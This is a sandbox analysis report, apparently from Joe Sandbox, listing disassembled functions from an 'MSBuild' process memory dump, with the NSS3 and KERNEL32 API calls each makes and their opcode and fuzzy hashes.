
Function 6CBF8530 Relevance: 7.6, APIs: 5, Instructions: 103COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6CBF8549
TlsGetValue.KERNEL32 ref: 6CBF85CF
TlsGetValue.KERNEL32 ref: 6CBF85FE
TlsGetValue.KERNEL32 ref: 6CBF8629
memcpy.VCRUNTIME140 ref: 6CBF8655

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$IdentitiesLayermemcpy
String ID:
API String ID: 2311246771-0
Opcode ID: de160829a47409c9424c6bd1bcba8d2fde29d7f5bd4e4cde8919a83c3dad51de
Instruction ID: f3e6cefcbd37825573959a86e5e36d5ad60270fb9373c30e745119c95385322d
Opcode Fuzzy Hash: de160829a47409c9424c6bd1bcba8d2fde29d7f5bd4e4cde8919a83c3dad51de
Instruction Fuzzy Hash: 46418270605781DFEB019F7AD5446ADBBB4FF47308F10862AD8A887B51DB31D49ACB82

Function 6CB5EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CB5EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CB5EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CB5EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB5EEEB
free.MOZGLUE(?), ref: 6CB5EEF6

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 248bca223a2bbbe5918870e758180c54810624581c031a82addb4274ab83f3f4
Instruction ID: c9e87bec3252d3146bc66a9b96ce4c54dc0f9f753d15d460fb26054785116bea
Opcode Fuzzy Hash: 248bca223a2bbbe5918870e758180c54810624581c031a82addb4274ab83f3f4
Instruction Fuzzy Hash: CD312871B002C09BE7209F2CCC4476A7BF4FB46305F940529E85A87A50E735E525CBE2

Function 6CC7A530 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CC7A55C
PR_IntervalNow.NSS3 ref: 6CC7A573
PR_IntervalNow.NSS3 ref: 6CC7A5A5
_PR_MD_UNLOCK.NSS3(?), ref: 6CC7A603

Part of subcall function 6CC29890: TlsGetValue.KERNEL32(?,?,?,6CC297EB), ref: 6CC2989E

_PR_MD_UNLOCK.NSS3(?), ref: 6CC7A636

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Interval$CriticalEnterSectionValue
String ID:
API String ID: 959321092-0
Opcode ID: 0c70543a40c931d5c207069b617bcc213594bc7a3ea43644a915c554207cd0dc
Instruction ID: 10b8ae84fc6a1954261525dbfc4a0a4f9756a8eafeb0cd7f4c2a61a308cbb5d6
Opcode Fuzzy Hash: 0c70543a40c931d5c207069b617bcc213594bc7a3ea43644a915c554207cd0dc
Instruction Fuzzy Hash: 67314DB1600A058FDB50DF29C8C0A9ABBB5FF84359F158265D8198BB16F734EC85CFA0

Function 6CB644D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6CB644FF

Part of subcall function 6CBC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB68298,?,?,?,6CB5FCE5,?), ref: 6CBC07BF
Part of subcall function 6CBC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBC07E6
Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC081B
Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC0825

SECOID_FindOID_Util.NSS3(?), ref: 6CB64524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CB64537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6CB64579

Part of subcall function 6CB641B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6CB641BE
Part of subcall function 6CB641B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CB641E9
Part of subcall function 6CB641B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6CB64227
Part of subcall function 6CB641B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6CB6423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB6459C

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: f1c88c8e01cf24e2cf95666ece0e9beb3053b029152c8d8207c18afdd4c99221
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: 8F21C771701A909BE710DA2BDC64B6B37A8DF41758F140429B9158BE51EB21ED04CEA2

Function 6CB6A6B0 Relevance: 7.6, APIs: 5, Instructions: 90timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(00000000,00000000,6CB6A2FA,00000000,6CB6A2FA,00000000), ref: 6CB6A6E4

Part of subcall function 6CB61DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CB61E0B
Part of subcall function 6CB61DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CB61E24

TlsGetValue.KERNEL32(?,?,?,?,6CB6A2FA,00000000), ref: 6CB6A723
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CB6A2FA,00000000), ref: 6CB6A733
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB6A2FA,00000000), ref: 6CB6A74C
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,6CB6A2FA,00000000), ref: 6CB6A774

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Choice_DecodeTime$Arena_CertCheckCriticalEnterFreeSectionTimesUnlockValidValue
String ID:
API String ID: 2353111112-0
Opcode ID: 8a77f58abeed340eb79aa3e66945a89447cb615c24b64e7070086846cd6e26aa
Instruction ID: 759e4fcb31e846201367d953a01626812bdb8219e11626524d9a8c8fe9b1a080
Opcode Fuzzy Hash: 8a77f58abeed340eb79aa3e66945a89447cb615c24b64e7070086846cd6e26aa
Instruction Fuzzy Hash: 2A210675A006509BEB009E2ACC41B7BB7B8EF5A258F144429EC6887F01FF30F5458AA6

Function 6CB6E5E0 Relevance: 7.6, APIs: 5, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6CB6E755,00000000,00000004,?,?), ref: 6CB6E5F5

Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D

PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6CB6E62C
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6CB6E63E

Part of subcall function 6CBBF9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6CB5F379,?,00000000,-00000002), ref: 6CBBF9B7

PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6CB6E65C

Part of subcall function 6CB8DDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CB8DDEC
Part of subcall function 6CB8DDD0: PK11_DigestBegin.NSS3(00000000), ref: 6CB8DE70
Part of subcall function 6CB8DDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CB8DE83
Part of subcall function 6CB8DDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6CB8DE95
Part of subcall function 6CB8DDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CB8DEAE
Part of subcall function 6CB8DDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB8DEBB

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6CB6E68E

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: K11_Util$Digest$ArenaItem_Mark_$AllocBeginContextCriticalDestroyEnterErrorFinalFindHashResultSectionTag_UnlockValueZfree
String ID:
API String ID: 2865137721-0
Opcode ID: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction ID: 6edca9955c47e9148c3d59a24c2c8c3b6c3422c38b662b86d8a18687927c72e7
Opcode Fuzzy Hash: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction Fuzzy Hash: 81210176B022D16FFB004EA6DC80E6E7798DF81258F254134EE1997E61EB21DD14C3E2

Function 6CB6AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CB63FFF,00000000,?,?,?,?,?,6CB61A1C,00000000,00000000), ref: 6CB6ADA7

Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CB63FFF,00000000,?,?,?,?,?,6CB61A1C,00000000,00000000), ref: 6CB6ADB4

Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CB63FFF,?,?,?,?,6CB63FFF,00000000,?,?,?,?,?,6CB61A1C,00000000), ref: 6CB6ADD5

Part of subcall function 6CBBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CBB8D2D,?,00000000,?), ref: 6CBBFB85
Part of subcall function 6CBBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CBBFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CC894B0,?,?,?,?,?,?,?,?,6CB63FFF,00000000,?), ref: 6CB6ADEC

Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB63FFF), ref: 6CB6AE3C

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 3e97dba117db11fbb8ab0a1095c10bad0e7c4daf9e6047c64a035eb7c6fa3915
Instruction ID: 7a3326b48a1450cd85a5b173f2008fabc07c7ac5203c48735ca46f7818a823e0
Opcode Fuzzy Hash: 3e97dba117db11fbb8ab0a1095c10bad0e7c4daf9e6047c64a035eb7c6fa3915
Instruction Fuzzy Hash: 4B113B71F002546BEB109B66DC41BBF73B8DF9514DF044129EC59A6B41FB20E95886E3

Function 6CB88E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6CBA2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB74F1C), ref: 6CB88EA2

Part of subcall function 6CBAF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CBAF854
Part of subcall function 6CBAF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CBAF868
Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CBAF882
Part of subcall function 6CBAF820: free.MOZGLUE(04C483FF,?,?), ref: 6CBAF889
Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CBAF8A4
Part of subcall function 6CBAF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CBAF8AB
Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CBAF8C9
Part of subcall function 6CBAF820: free.MOZGLUE(280F10EC,?,?), ref: 6CBAF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6CBA2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB74F1C), ref: 6CB88EC3
TlsGetValue.KERNEL32(?,?,?,6CBA2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB74F1C), ref: 6CB88EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6CBA2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB88EF1
PR_Unlock.NSS3 ref: 6CB88F20

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: 706a918d782de2618097cb16527e48cba4b0248579be892004432d1f9fe5cc04
Instruction ID: 291d3eb7d5b0722e7b4b15d92980a8fd3a9f60c6273e7a8be17a3349d290cca3
Opcode Fuzzy Hash: 706a918d782de2618097cb16527e48cba4b0248579be892004432d1f9fe5cc04
Instruction Fuzzy Hash: 48215A70A0A6459FDB00AF29D4845ADBBF0FF48318F41496EE8989BB41E731E854CBD2

Function 6CBF04C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6CBF461B,-00000004), ref: 6CBF04DF
TlsGetValue.KERNEL32(?,00000000,?,6CBF461B,-00000004), ref: 6CBF0510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6CBF0520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6CBF461B,-00000004), ref: 6CBF0534
GetLastError.KERNEL32(?,6CBF461B,-00000004), ref: 6CBF0543

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: 082201fdef2e8639c772e0f0e02a44f963bd1505a45d459922f5c0ae0fac2efd
Instruction ID: 2495617a85504e68df033ca992c23f2c9661a1922253b6f1d55a16546253656a
Opcode Fuzzy Hash: 082201fdef2e8639c772e0f0e02a44f963bd1505a45d459922f5c0ae0fac2efd
Instruction Fuzzy Hash: F1112B75B041C25BDB016A78AC94B693775EF01318F604624E435C3BB0EB71D959C7A2

Function 6CB8CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CBA1E10: TlsGetValue.KERNEL32 ref: 6CBA1E36
Part of subcall function 6CBA1E10: EnterCriticalSection.KERNEL32(?,?,?,6CB7B1EE,2404110F,?,?), ref: 6CBA1E4B
Part of subcall function 6CBA1E10: PR_Unlock.NSS3 ref: 6CBA1E76

free.MOZGLUE(?,6CB8D079,00000000,00000001), ref: 6CB8CDA5
PK11_FreeSymKey.NSS3(?,6CB8D079,00000000,00000001), ref: 6CB8CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CB8D079,00000000,00000001), ref: 6CB8CDCF
DeleteCriticalSection.KERNEL32(?,6CB8D079,00000000,00000001), ref: 6CB8CDE2
free.MOZGLUE(?), ref: 6CB8CDE9

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: cfc380ddb49ce438a0678896b39d6d892c2d0c95c4539bf0e18c6dd219400c25
Instruction ID: 14dd8519718c71f376f5b8487e6e1f101cf2a8815fd6ae41da8cba5e01d60a7a
Opcode Fuzzy Hash: cfc380ddb49ce438a0678896b39d6d892c2d0c95c4539bf0e18c6dd219400c25
Instruction Fuzzy Hash: F911C2F6B02161ABDB00AFA5EC8499AB73CFF042597140221E90997E01E732F474C7E2

Function 6CBF2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CBF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBF5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBF2CEC

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

PR_EnterMonitor.NSS3(?), ref: 6CBF2D02
PR_EnterMonitor.NSS3(?), ref: 6CBF2D1F
PR_ExitMonitor.NSS3(?), ref: 6CBF2D42
PR_ExitMonitor.NSS3(?), ref: 6CBF2D5B

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 215a2b6731b273b6720477662404a65502753934802b507a30744073a6c62afb
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: D101DBB5A002845BE7309F25FC40BC7B7A5EF45318F004525E86D86B10E636F41EC7A3

Function 6CBF2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CBF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBF5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBF2D9C

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

PR_EnterMonitor.NSS3(?), ref: 6CBF2DB2
PR_EnterMonitor.NSS3(?), ref: 6CBF2DCF
PR_ExitMonitor.NSS3(?), ref: 6CBF2DF2
PR_ExitMonitor.NSS3(?), ref: 6CBF2E0B

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: fc291948f8f2db21fde22ffd71b02fde37804260090d254b5056d55d412d8db7
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: DD01C4B5A002845BEB309F25FC01FC7B7A1EF45318F004435E86986B11E636F82E86A3

Function 6CB8AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6CB73090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB8AE42), ref: 6CB730AA
Part of subcall function 6CB73090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB730C7
Part of subcall function 6CB73090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CB730E5
Part of subcall function 6CB73090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB73116
